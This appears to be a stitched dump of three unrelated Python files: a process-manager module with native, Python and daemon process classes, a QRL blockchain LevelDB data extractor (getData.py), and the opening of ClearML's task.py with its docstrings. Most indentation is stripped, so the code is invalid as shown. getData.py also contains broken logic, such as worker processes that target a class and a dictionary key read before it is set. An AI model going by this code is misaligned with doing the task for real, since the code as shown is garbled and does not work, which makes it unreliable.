state.pid = self.proc.pid or 0
state.exitCode = self.proc.exitcode or 0
return state
class NativeProcess(ManagerProcess):
def __init__(self, name, cwd, cmdline, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.cwd = cwd
self.cmdline = cmdline
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
pass
def start(self):
    # In case we only tried a non-blocking stop, we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cwd = os.path.join(BASEDIR, self.cwd)
cloudlog.info(f"starting process {self.name}")
self.proc = Process(name=self.name, target=nativelauncher, args=(self.cmdline, cwd))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class PythonProcess(ManagerProcess):
def __init__(self, name, module, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.module = module
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
if self.enabled:
cloudlog.info(f"preimporting {self.module}")
importlib.import_module(self.module)
def start(self):
    # In case we only tried a non-blocking stop, we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cloudlog.info(f"starting python {self.module}")
self.proc = Process(name=self.name, target=launcher, args=(self.module, self.name))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class DaemonProcess(ManagerProcess):
"""Python process that has to stay running across manager restart.
This is used for athena so you don't lose SSH access when restarting manager."""
def __init__(self, name, module, param_name, enabled=True):
self.name = name
self.module = module
self.param_name = param_name
self.enabled = enabled
self.persistent = True
def prepare(self):
pass
def start(self):
params = Params()
pid = params.get(self.param_name, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if self.module in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info(f"starting daemon {self.name}")
proc = subprocess.Popen(['python', '-m', self.module], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(self.param_name, str(proc.pid))
def stop(self, retry=True, block=True):
pass
def ensure_running(procs, started, driverview=False, not_run=None):
if not_run is None:
not_run = []
for p in procs:
if p.name in not_run:
p.stop(block=False)
elif not p.enabled:
p.stop(block=False)
elif p.persistent:
p.start()
elif p.driverview and driverview:
p.start()
elif started:
p.start()
else:
p.stop(block=False)
p.check_watchdog(started)
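

# --- Illustrative sketch, not part of the original manager code ---
# A minimal example of how the process classes above could be wired into a
# supervision loop. The names, paths and modules below are placeholders for
# illustration only; the real manager builds its process list elsewhere.
def _example_manager_loop():
  procs = [
    NativeProcess("example_native", "selfdrive/example", ["./example"]),  # hypothetical entry
    PythonProcess("example_python", "selfdrive.example.example_daemon"),  # hypothetical entry
  ]
  for p in procs:
    p.prepare()
  try:
    while True:
      started = True  # the real manager derives this from vehicle state
      ensure_running(procs, started)
      time.sleep(1)
  finally:
    for p in procs:
      p.stop()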
|
getData.py
|
import plyvel
import argparse
import base64
import binascii
from datetime import datetime
import json
import sys
from qrl.core.PaginatedData import PaginatedData
from qrl.core.PaginatedBitfield import PaginatedBitfield
from qrl.core.misc.db import DB
from qrl.generated import qrl_pb2
from google.protobuf.json_format import MessageToJson, Parse, MessageToDict
import multiprocessing
class getData:
def getBlockHeight(source):
dbb = plyvel.DB(source)
blockheight = int.from_bytes(dbb.get(b'blockheight'), byteorder='big', signed=False)
return blockheight
def getBlockData(i, source ):
dbb = plyvel.DB(source)
pbdata = qrl_pb2.Block()
block_number_mapping = qrl_pb2.BlockNumberMapping()
hashHeader = Parse(dbb.get(str(i).encode()), block_number_mapping).headerhash
pbdata.ParseFromString(bytes(dbb.get(hashHeader)))
dictData = MessageToDict(pbdata)
# BlockDataPoint and BlockExtended not working yet
#BlockDataPointData = qrl_pb2.BlockDataPoint()
#BlockDataPointData.ParseFromString(bytes(db.get(hashHeader)))
#print(BlockDataPointData)
#BlockDataPointDic = MessageToDict(BlockDataPointData)
#print(BlockDataPointDic)
#print('BlockDataPoint')
#LatticePKData = qrl_pb2.LatticePK()
#LatticePKData.ParseFromString(db.get(addrByte))
#LatticePKDic = MessageToDict(LatticePKData)
#test = Parse(db.get(str(i).encode()), block_number_mapping)
#BlockExtendedData = qrl_pb2.BlockExtended()
#BlockExtendedData.ParseFromString(bytes(db.get(test)))
#print(BlockExtendedData)
#BlockExtendedDic = MessageToDict(BlockExtendedData)
#print(BlockExtendedDic)
#print('BlockExtended')
blockData = {}
blockData["block_number"] = i
blockData["hash_header"] = hashHeader.hex()
blockData["timestamp"] = datetime.fromtimestamp(int(dictData["header"]["timestampSeconds"]))
blockData["reward_block"] = dictData["header"]["rewardBlock"]
blockData["merkle_root"] = dictData["header"]["merkleRoot"]
if "hashHeaderPrev" in dictData["header"]:
blockData["hash_header_prev"] = base64.b64decode(dictData["header"]["hashHeaderPrev"]).hex()
if "rewardFee" in dictData["header"]:
blockData["reward_fee"] = dictData["header"]["rewardFee"]
if "miningNonce" in dictData["header"]:
blockData["mining_nonce"] = int(dictData["header"]["miningNonce"])
if "extraNonce" in dictData["header"]:
blockData["extra_nonce"] = int(dictData["header"]["extraNonce"])
if "genesisBalance" in dictData:
blockData["genesis_balance"] = dictData["genesisBalance"][0]["balance"]
if "transactions" in dictData:
blockData["transactions"] = dictData["transactions"]
return blockData
def getTransactionData(t, block_number, timestamp):
tData = {}
tData["block_number"], tData["timestamp"] = block_number, timestamp
tData["transaction_hash"] = base64.b64decode(t["transactionHash"]).hex()
if "masterAddr" in t:
tData["master_addr"] = "Q" + base64.b64decode(t["masterAddr"]).hex()
if "publicKey" in t:
tData["public_key"] = base64.b64decode(t["publicKey"]).hex()
if "signature" in t:
tData["signature"] = base64.b64decode(t["signature"]).hex()
if "nonce" in t:
tData["nonce"] = t["nonce"]
if "fee" in t:
tData["fee"] = t["fee"]
return tData
def getTransactionDataCoinbase(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["addr_to"] = "".join(["Q" , base64.b64decode(t["coinbase"]["addrTo"]).hex()])
tData["amount"] = t["coinbase"]["amount"]
return tData
def getTransactionDataTransfer(t, block_number, timestamp, transfer):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["addr_to"] = "".join(["Q" , base64.b64decode(transfer["addr_to"]).hex()])
tData["amount"] = transfer["amount"]
return tData
def getTransactionDataToken(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["symbol"] = base64.b64decode(t["token"]["symbol"]).decode("utf-8")
tData["name"] = base64.b64decode(t["token"]["name"]).decode("utf-8")
tData["owner"] = "".join(["Q" , base64.b64decode(t["token"]["owner"]).hex()])
tData["initial_balances"] = t["token"]["initialBalances"]
tData["initial_balances"] = list(map(lambda x: json.dumps(x), tData["initial_balances"]))
if "decimals" in t["token"]:
tData["decimals"] = t["token"]["decimals"]
return tData
def getTransactionDataMessage(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["message_hash"] = t["message"]["messageHash"]
try:
messageHash = base64.b64decode(t["message"]["messageHash"]).decode("utf-8")
tData["message_text"] = messageHash
except:
messageHash = base64.b64decode(t["message"]["messageHash"]).hex()
tData["message_text"] = messageHash
#https://github.com/theQRL/qips/blob/master/qips/QIP002.md
if messageHash.startswith("afaf"):
if messageHash.startswith("afafa1"):
try:
docText = binascii.a2b_hex(messageHash[46:]).decode("utf-8")
except:
docText = binascii.a2b_hex(messageHash[46:]).hex()
tData["message_text"] = " ".join(["[Doc notarization] SHA1:" , messageHash[6:46] , "TEXT:" , docText])
elif messageHash.startswith("afafa2"):
try:
docText = binascii.a2b_hex(messageHash[70:]).decode("utf-8")
except:
docText = binascii.a2b_hex(messageHash[70:]).hex()
tData["message_text"] = " ".join(["[Doc notarization] SHA256:" , messageHash[6:70] , "TEXT:" , docText])
elif messageHash.startswith("afafa3"):
try:
docText = binascii.a2b_hex(messageHash[38:]).decode("utf-8")
except:
docText = binascii.a2b_hex(messageHash[38:]).hex()
tData["message_text"] = " ".join(["[Doc notarization] MD5:" , messageHash[6:38] , "TEXT:" , docText ])
#https://github.com/theQRL/message-transaction-encoding
elif messageHash.startswith("0f0f"):
msgHeader = "[Unknown]"
msgBegin = 8
text = ""
if messageHash.startswith("0f0f0000") or messageHash.startswith("0f0f0001"):
msgHeader = "[Reserved] "
elif messageHash.startswith("0f0f0002"):
if messageHash.startswith("0f0f0002af"):
msgHeader = "[Keybase-remove] "
elif messageHash.startswith("0f0f0002aa"):
msgHeader = "[Keybase-add] "
else:
msgHeader = "".join(["[Keybase-" , messageHash[8:10] , "]" ])
msgBegin = 12
try:
user = binascii.a2b_hex(messageHash[msgBegin:].split("20")[0]).decode("utf-8")
keybaseHex = binascii.a2b_hex(messageHash[msgBegin + len(user)*2 + 2:]).hex()
text = "".join(["USER:" , user , " KEYBASE_HEX:" , keybaseHex ])
except:
text = ""
elif messageHash.startswith("0f0f0003"):
if messageHash.startswith("0f0f0002af"):
msgHeader = "[Github-remove] "
elif messageHash.startswith("0f0f0002aa"):
msgHeader = "[Github-add] "
else:
msgHeader = "".join(["[Github-" , messageHash[8:10] , "] " ])
msgBegin = 18
text = binascii.a2b_hex(messageHash[msgBegin:]).hex()
elif messageHash.startswith("0f0f0004"):
msgHeader = "[Vote] "
if len(text) == 0:
try:
text = binascii.a2b_hex(messageHash[msgBegin:]).decode("utf-8")
except:
try:
text = binascii.a2b_hex(messageHash[msgBegin:]).hex()
except:
text = str(messageHash[msgBegin:])
tData["message_text"] = " ".join([msgHeader , text ])
return tData
def getTransactionDataLatticePk(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
print('&&&&&&&&&&&&&')
print('latticePk - T')
for key, value in t.items() :
print(key)
print('--------------------')
print('--------------------')
for key, value in t["latticePk"].items() :
print(key)
print('^^^^^^^^^^^^^^^^')
tData["kyber_pk"] = t["latticePk"]["kyberPK"]
tData["dilithium_pk"] = t["latticePk"]["dilithiumPK"]
return tData
def getTransactionDataSlave(t, block_number, timestamp, transfer):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["slave_pk"] = "".join(["Q" , base64.b64decode(transfer["slave_pk"]).hex()])
tData["access_type"] = transfer["access_type"]
return tData
def getTransactionDataTransferToken(t, block_number, timestamp, transfer):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["token_txhash"] = transfer["token_txhash"]
tData["addr_to"] = "".join(["Q" , base64.b64decode(transfer["addr_to"]).hex()])
tData["amount"] = transfer["amount"]
return tData
def getTransactionDataOthers(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
print('------------------------')
print('not transactionProcessed')
print('------------------------')
print(t)
print('------------------------')
if "multiSigCreate" in t:
tData['type'] = "multiSigCreate"
if "multiSigSpend" in t:
tData['type'] = "multiSigSpend"
if "multiSigVote" in t:
tData['type'] = "multiSigVote"
if len(tData['type']) == 0:
tData['type'] = "unkown"
for key, value in tData.items() :
print(key)
print('--------------------')
print('--------------------')
print('transaction unkown')
sys.exit("transaction unkown")
tData['data'] = str(t)
return tData
def getAddressData(source, b64Addr, timeStamp):
try:
#addrData = qrl_pb2.AddressState()
addrData = qrl_pb2.OptimizedAddressState()
addrByte = base64.b64decode(b64Addr)
address = "Q" + addrByte.hex()
tree_dict = {
0: 256,
8: 256,
10: 256,
12 : 256,
14: 256,
16: 256,
18 : 256,
}
tree_height = int(address[4]) * 2
dbb = plyvel.DB(source)
addrData.ParseFromString(dbb.get(addrByte))
dictData = MessageToDict(addrData)
databasee = DB()
n = 0
false_loop = 0
OTSBitfieldByPageDic = []
while n < tree_dict[tree_height]:
page = (n // 8192) + 1
PaginatedBitfieldKey = PaginatedBitfield.generate_bitfield_key(PaginatedBitfield(False, databasee), addrByte, page)
obj = PaginatedBitfield(False, databasee)
obj.load_bitfield(addrByte, n)
ots_bitfield = obj.key_value[PaginatedBitfieldKey]
OTSBitfieldByPageDic.append(PaginatedBitfield.ots_key_reuse(ots_bitfield, n))
if PaginatedBitfield.ots_key_reuse(ots_bitfield, n) == False:
false_loop = false_loop + 1
if false_loop > 5:
break
# print(PaginatedBitfield.ots_key_reuse(ots_bitfield, n))
n = n + 1
OTSBitfieldByPageData = qrl_pb2.OTSBitfieldByPage()
OTSBitfieldByPageData.ParseFromString(dbb.get(addrByte))
# OTSBitfieldByPageDic = MessageToDict(OTSBitfieldByPageData)
#print(OTSBitfieldByPageDic)
#print('OTSBitfieldByPage')
DataList = qrl_pb2.DataList()
DataListData = qrl_pb2.DataList()
DataListData.ParseFromString(dbb.get(addrByte))
DataListDic = MessageToDict(DataListData)
#print(DataListDic)
#print('DataList')
BitfieldData = qrl_pb2.Bitfield()
BitfieldData.ParseFromString(dbb.get(addrByte))
BitfieldDic = MessageToDict(BitfieldData)
#print(BitfieldDic)
#print('Bitfield')
TransactionHashListData = qrl_pb2.TransactionHashList()
TransactionHashListData.ParseFromString(dbb.get(addrByte))
TransactionHashListDic = MessageToDict(TransactionHashListData)
#print(TransactionHashListDic)
#print('TransactionHashList')
LatticePKData = qrl_pb2.LatticePK()
LatticePKData.ParseFromString(dbb.get(addrByte))
LatticePKDic = MessageToDict(LatticePKData)
#print(LatticePKDic)
#print('LatticePK')
MultiSigAddressStateData = qrl_pb2.MultiSigAddressState()
MultiSigAddressStateData.ParseFromString(dbb.get(addrByte))
MultiSigAddressStateDic = MessageToDict(MultiSigAddressStateData)
#print(MultiSigAddressStateDic)
#print('MultiSigAddressStateDic')
MultiSigAddressesListData = qrl_pb2.MultiSigAddressesList()
MultiSigAddressesListData.ParseFromString(dbb.get(addrByte))
MultiSigAddressesListDic = MessageToDict(MultiSigAddressesListData)
#print(MultiSigAddressesListDic)
#print('MultiSigAddressesListDic')
addressData = {}
if "balance" in dictData:
addressData["balance"] = dictData["balance"]
else:
addressData["balance"] = "0"
if "nonce" in dictData:
addressData["nonce"] = dictData["nonce"]
if "usedOtsKeyCount" in dictData:
addressData["use_otskey_count"] = dictData["usedOtsKeyCount"]
if "transactionHashCount" in dictData:
addressData["transaction_hash_count"] = dictData["transactionHashCount"]
if "tokensCount" in dictData:
addressData["tokens_count"] = dictData["tokensCount"]
if "slavesCount" in dictData:
addressData["slaves_count"] = dictData["slavesCount"]
if OTSBitfieldByPageDic:
addressData["ots_bitfield"] = OTSBitfieldByPageDic
if "pageNumber" in OTSBitfieldByPageDic:
addressData["ots_bitfield_page_number"] = OTSBitfieldByPageDic["pageNumber"]
if "values" in DataListDic:
addressData["data_list"] = DataListDic["values"]
if "bitfields" in BitfieldDic:
addressData["bitfields"] = BitfieldDic["bitfields"]
if "hashes" in TransactionHashListDic:
addressData["transactionhash_list"] = TransactionHashListDic["hashes"]
if "kyberPk" in LatticePKDic:
addressData["kyber_pk"] = LatticePKDic["kyberPk"]
if "address" in MultiSigAddressStateDic:
addressData["multi_sig_addresses_hashes_address"] = MultiSigAddressStateDic["address"]
if "nonce" in MultiSigAddressStateDic:
addressData["multi_sig_addresses_hashes_nonce"] = MultiSigAddressStateDic["nonce"]
if "weights" in MultiSigAddressStateDic:
addressData["multi_sig_addresses_hashes_weights"] = MultiSigAddressStateDic["weights"]
if "hashes" in MultiSigAddressesListDic:
addressData["multi_sig_addresses_list_hashes"] = MultiSigAddressesListDic["hashes"]
addressData["last_seen"] = timeStamp
addressData["first_seen"] = timeStamp
addressData["address"] = address
return addressData
except Exception as e:
print(e)
raise
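

# --- Illustrative sketch, not part of the original script ---
# A minimal example of how the block helpers above could be chained to walk a
# range of blocks. `state_db_path` is a placeholder for the path to a QRL
# state LevelDB directory.
def exampleDumpBlocks(state_db_path, first=0, last=10):
    height = getData.getBlockHeight(state_db_path)
    last = min(last, height)
    for i in range(first, last + 1):
        block = getData.getBlockData(i, state_db_path)
        print(block["block_number"], block["hash_header"], block["timestamp"])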
if __name__ == "__main__":
    # Create eight worker processes
p1 = multiprocessing.Process(target=getData)
p2 = multiprocessing.Process(target=getData)
p3 = multiprocessing.Process(target=getData)
p4 = multiprocessing.Process(target=getData)
p5 = multiprocessing.Process(target=getData)
p6 = multiprocessing.Process(target=getData)
p7 = multiprocessing.Process(target=getData)
p8 = multiprocessing.Process(target=getData)
    # Start all eight processes
p1.start()
p2.start()
p3.start()
p4.start()
p5.start()
p6.start()
p7.start()
p8.start()
|
task.py
|
import atexit
import json
import os
import shutil
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from logging import getLogger
from operator import attrgetter
from tempfile import mkstemp, mkdtemp
from zipfile import ZipFile, ZIP_DEFLATED
try:
# noinspection PyCompatibility
from collections.abc import Sequence as CollectionsSequence
except ImportError:
from collections import Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, Iterable, TYPE_CHECKING, Callable, Tuple, List
import psutil
import six
from pathlib2 import Path
from .backend_config.defs import get_active_config_file, get_config_file
from .backend_api.services import tasks, projects
from .backend_api.session.session import (
Session, ENV_ACCESS_KEY, ENV_SECRET_KEY, ENV_HOST, ENV_WEB_HOST, ENV_FILES_HOST, )
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.log import TaskHandler
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.task.models import TaskModels
from .backend_interface.util import get_single_result, exact_match_regex, make_message, mutually_exclusive, get_queue_id
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.fastai_bind import PatchFastai
from .binding.frameworks.lightgbm_bind import PatchLIGHTgbmModelIO
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.frameworks.megengine_bind import PatchMegEngineModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .binding.hydra_bind import PatchHydra
from .binding.click_bind import PatchClick
from .binding.jsonargs_bind import PatchJsonArgParse
from .config import (
config, DEV_TASK_NO_REUSE, get_is_master_node, DEBUG_SIMULATE_REMOTE_TASK, DEV_DEFAULT_OUTPUT_URI,
deferred_config, TASK_SET_ITERATION_OFFSET, )
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel
from .task_parameters import TaskParameters
from .utilities.config import verify_basic_value
from .binding.args import (
argparser_parseargs_called, get_argparser_last_args,
argparser_update_currenttask, )
from .utilities.dicts import ReadOnlyDict, merge_dicts
from .utilities.proxy_object import (
ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary,
nested_from_flat_dictionary, naive_nested_from_flat_dictionary, )
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
from .utilities.lowlevel.threads import get_current_thread_id
from .utilities.process.mp import BackgroundMonitor, leave_process
# noinspection PyProtectedMember
from .backend_interface.task.args import _Arguments
if TYPE_CHECKING:
import pandas
import numpy
from PIL import Image
class Task(_Task):
"""
The ``Task`` class is a code template for a Task object which, together with its connected experiment components,
represents the current running experiment. These connected components include hyperparameters, loggers,
configuration, label enumeration, models, and other artifacts.
The term "main execution Task" refers to the Task context for current running experiment. Python experiment scripts
can create one, and only one, main execution Task. It is a traceable, and after a script runs and ClearML stores
the Task in the **ClearML Server** (backend), it is modifiable, reproducible, executable by a worker, and you
can duplicate it for further experimentation.
The ``Task`` class and its methods allow you to create and manage experiments, as well as perform
advanced experimentation functions, such as autoML.
.. warning::
Do not construct Task objects directly. Use one of the methods listed below to create experiments or
reference existing experiments.
For detailed information about creating Task objects, see the following methods:
- Create a new reproducible Task - :meth:`Task.init`
.. important::
In some cases, ``Task.init`` may return a Task object which is already stored in **ClearML Server** (already
initialized), instead of creating a new Task. For a detailed explanation of those cases, see the ``Task.init``
method.
- Manually create a new Task (no auto-logging will apply) - :meth:`Task.create`
- Get the current running Task - :meth:`Task.current_task`
- Get another (different) Task - :meth:`Task.get_task`
.. note::
        The **ClearML** documentation often refers to a Task as "Task (experiment)".
"Task" refers to the class in the ClearML Python Client Package, the object in your Python experiment script,
and the entity with which **ClearML Server** and **ClearML Agent** work.
"Experiment" refers to your deep learning solution, including its connected components, inputs, and outputs,
and is the experiment you can view, analyze, compare, modify, duplicate, and manage using the ClearML
**Web-App** (UI).
Therefore, a "Task" is effectively an "experiment", and "Task (experiment)" encompasses its usage throughout
    ClearML.
The exception to this Task behavior is sub-tasks (non-reproducible Tasks), which do not use the main execution
Task. Creating a sub-task always creates a new Task with a new Task ID.
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Optional[Task]
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = deferred_config('development.task_reuse_time_window_in_hours', 24.0, float)
__detect_repo_async = deferred_config('development.vcs_repo_detect_async', False)
__default_output_uri = DEV_DEFAULT_OUTPUT_URI.get() or deferred_config('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
**Do not construct Task manually!**
Please use :meth:`Task.init` or :meth:`Task.get_task`
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._calling_filename = None
self._remote_functions_generated = {}
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Get the current running Task (experiment). This is the main execution Task (task context) returned as a Task
object.
:return: The current running Task (experiment).
"""
# check if we have no main Task, but the main process created one.
if not cls.__main_task and cls.__get_master_id_task_id():
# initialize the Task, connect to stdout
cls.init()
# return main Task
return cls.__main_task
@classmethod
def init(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=TaskTypes.training, # type: Task.TaskTypes
tags=None, # type: Optional[Sequence[str]]
reuse_last_task_id=True, # type: Union[bool, str]
continue_last_task=False, # type: Union[bool, str, int]
output_uri=None, # type: Optional[Union[str, bool]]
auto_connect_arg_parser=True, # type: Union[bool, Mapping[str, bool]]
auto_connect_frameworks=True, # type: Union[bool, Mapping[str, bool]]
auto_resource_monitoring=True, # type: bool
auto_connect_streams=True, # type: Union[bool, Mapping[str, bool]]
):
# type: (...) -> "Task"
"""
Creates a new Task (experiment) if:
- The Task never ran before. No Task with the same ``task_name`` and ``project_name`` is stored in
**ClearML Server**.
- The Task has run before (the same ``task_name`` and ``project_name``), and (a) it stored models and / or
          artifacts, or (b) its status is Published, or (c) it is Archived.
- A new Task is forced by calling ``Task.init`` with ``reuse_last_task_id=False``.
Otherwise, the already initialized Task object for the same ``task_name`` and ``project_name`` is returned.
.. note::
To reference another Task, instead of initializing the same Task more than once, call
:meth:`Task.get_task`. For example, to "share" the same experiment in more than one script,
call ``Task.get_task``. See the ``Task.get_task`` method for an example.
For example:
The first time the following code runs, it will create a new Task. The status will be Completed.
.. code-block:: py
from clearml import Task
task = Task.init('myProject', 'myTask')
If this code runs again, it will not create a new Task. It does not store a model or artifact,
        it is not Published (its status is Completed), it was not Archived, and a new Task is not forced.
If the Task is Published or Archived, and run again, it will create a new Task with a new Task ID.
The following code will create a new Task every time it runs, because it stores an artifact.
.. code-block:: py
task = Task.init('myProject', 'myOtherTask')
d = {'a': '1'}
task.upload_artifact('myArtifact', d)
:param str project_name: The name of the project in which the experiment will be created. If the project does
not exist, it is created. If ``project_name`` is ``None``, the repository name is used. (Optional)
:param str task_name: The name of Task (experiment). If ``task_name`` is ``None``, the Python experiment
script's file name is used. (Optional)
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:param tags: Add a list of tags (str) to the created Task. For example: tags=['512x512', 'yolov3']
:param bool reuse_last_task_id: Force a new Task (experiment) with a previously used Task ID,
and the same project and Task name.
.. note::
If the previously executed Task has artifacts or models, it will not be reused (overwritten)
and a new Task will be created.
When a Task is reused, the previous execution outputs are deleted, including console outputs and logs.
The values are:
- ``True`` - Reuse the last Task ID. (default)
- ``False`` - Force a new Task (experiment).
- A string - You can also specify a Task ID (string) to be reused,
instead of the cached ID based on the project/name combination.
:param bool continue_last_task: Continue the execution of a previously executed Task (experiment)
.. note::
When continuing the executing of a previously executed Task,
all previous artifacts / models/ logs are intact.
New logs will continue iteration/step based on the previous-execution maximum iteration value.
For example:
The last train/loss scalar reported was iteration 100, the next report will be iteration 101.
The values are:
          - ``True`` - Continue the last Task ID,
            specified explicitly by reuse_last_task_id or implicitly with the same logic as reuse_last_task_id.
- ``False`` - Overwrite the execution of previous Task (default).
- A string - You can also specify a Task ID (string) to be continued.
This is equivalent to `continue_last_task=True` and `reuse_last_task_id=a_task_id_string`.
          - An integer - Specify initial iteration offset (override the automatic last_iteration_offset)
Pass 0, to disable the automatic last_iteration_offset or specify a different initial offset
You can specify a Task ID to be used with `reuse_last_task_id='task_id_here'`
:param str output_uri: The default location for output models and other artifacts.
If True is passed, the default files_server will be used for model storage.
In the default location, ClearML creates a subfolder for the output.
The subfolder structure is the following:
<output destination name> / <project name> / <task name>.<Task ID>
The following are examples of ``output_uri`` values for the supported locations:
- A shared folder: ``/mnt/share/folder``
- S3: ``s3://bucket/folder``
- Google Cloud Storage: ``gs://bucket-name/folder``
- Azure Storage: ``azure://company.blob.core.windows.net/folder/``
- Default file server: True
.. important::
For cloud storage, you must install the **ClearML** package for your cloud storage type,
and then configure your storage credentials. For detailed information, see
`ClearML Python Client Extras <./references/clearml_extras_storage/>`_ in the "ClearML Python Client
Reference" section.
:param auto_connect_arg_parser: Automatically connect an argparse object to the Task
The values are:
- ``True`` - Automatically connect. (default)
- ``False`` - Do not automatically connect.
          - A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of connected
arguments. The dictionary keys are argparse variable names and the values are booleans.
The ``False`` value excludes the specified argument from the Task's parameter section.
            Keys missing from the dictionary default to ``True``; you can change this to ``False`` by adding
            the ``*`` key as ``False`` to the dictionary.
An empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_arg_parser={'do_not_include_me': False, }
.. code-block:: py
auto_connect_arg_parser={"only_include_me": True, "*": False}
.. note::
To manually connect an argparse, use :meth:`Task.connect`.
        :param auto_connect_frameworks: Automatically connect frameworks. This includes patching MatplotLib, XGBoost,
scikit-learn, Keras callbacks, and TensorBoard/X to serialize plots, graphs, and the model location to
the **ClearML Server** (backend), in addition to original output destination.
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of connected
frameworks. The dictionary keys are frameworks and the values are booleans.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_frameworks={
'matplotlib': True, 'tensorflow': True, 'tensorboard': True, 'pytorch': True,
'xgboost': True, 'scikit': True, 'fastai': True, 'lightgbm': True,
'hydra': True, 'detect_repository': True, 'tfdefines': True, 'joblib': True,
'megengine': True, 'jsonargparse': True,
}
:param bool auto_resource_monitoring: Automatically create machine resource monitoring plots
These plots appear in the **ClearML Web-App (UI)**, **RESULTS** tab, **SCALARS** sub-tab,
with a title of **:resource monitor:**.
The values are:
- ``True`` - Automatically create resource monitoring plots. (default)
- ``False`` - Do not automatically create.
- Class Type - Create ResourceMonitor object of the specified class type.
:param auto_connect_streams: Control the automatic logging of stdout and stderr
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of stdout and
stderr. The dictionary keys are 'stdout', 'stderr', and 'logging'; the values are booleans.
Keys missing from the dictionary default to ``False``, and an empty dictionary defaults to ``False``.
Notice that the default behaviour is to log stdout/stderr; output from the
`logging` module is captured as a by-product of the stderr logging.
For example:
.. code-block:: py
auto_connect_streams={'stdout': True, 'stderr': True, 'logging': False}
:return: The main execution Task (Task context).
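For example, a minimal usage sketch (the project/task names and the S3 bucket are placeholders):
.. code-block:: py
    from clearml import Task
    # create (or reuse) the main execution Task and store outputs on S3
    task = Task.init(
        project_name='examples', task_name='my experiment',
        output_uri='s3://bucket/folder',
        auto_connect_frameworks={'matplotlib': True, 'tensorflow': False},
    )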
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type) if task_type else task_type, str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`, "
"or close the current task with `task.close()` before calling `Task.init(...)`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
